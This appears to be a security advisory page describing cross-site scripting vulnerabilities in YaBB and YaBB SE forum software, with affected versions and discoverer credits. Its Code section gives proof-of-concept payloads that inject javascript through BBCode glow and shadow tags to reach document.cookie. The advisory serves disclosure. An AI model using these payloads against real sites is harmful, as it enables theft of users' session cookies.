exploits , vulnerabilities , articles , YABB/YABB SE Multiple Cross-Site Scripting Vulnerabilites

Title	YABB/YABB SE Multiple Cross-Site Scripting Vulnerabilites
Published	2004-03-15-12:00AM
Updated	2004-09-22-01:48PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Discovery of this issue is credited to Cheng Peng Su <apple_soup@msn.com> this issue was also independently discovered by frog-m@n.
Vulnerable	YaBB SE YaBB SE 1.5.1 YaBB SE Simple Machines SMF 1.0 b YaBB YaBB 1 Gold SP 1.3
Not Vulnerable	YaBB YaBB 1 Gold - SP 1.3.2
Code	No exploit is required to leverage this issue. The following proof of concept has been provided: [glow=red);background:url(javascript:alert(document.cookie));filter:glow(color=red,2,300]Big Exploit[/glow] [shadow=red);background:url(javascript:alert(document.cookie));filter:shadow(color=red,left,300]Big Exploit[/shadow] The following proof of concept has been supplied by frog-m@n: [glow=red,2);background:url(javascript:[SCRIPT],300]text[/glow]
TXT

Vulnerabilities - newest 10 RSS | More

• 2008-12-04 Rae Media Web Based Contact Management Login SQL Injection Vulnerability
• 2008-12-04 Nagios External Commands and Adaptive Commands Unspecified Vulnerability
• 2008-12-04 Z1Exchange SQL Injection and Cross Site Scripting Vulnerabilities
• 2008-12-04 mvnForum Cross Site Scripting Vulnerability
• 2008-12-04 i-Net Solution Orkut Clone SQL Injection and Cross Site Scripting Vulnerabilities
• 2008-12-04 Sun Java Runtime Environment and Java Development Kit Multiple Security Vulnerabilities
• 2008-12-04 Jbook SQL Injection Vulnerability
• 2008-12-04 SquirrelMail Malformed HTML Mail Message HTML Injection Vulnerability
• 2008-12-04 HP-UX Unspecified Local Denial Of Service Vulnerability
• 2008-12-04 Netrw Vim Script Information Disclosure Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Fri, 05 Dec 2008 17:14:56 +0000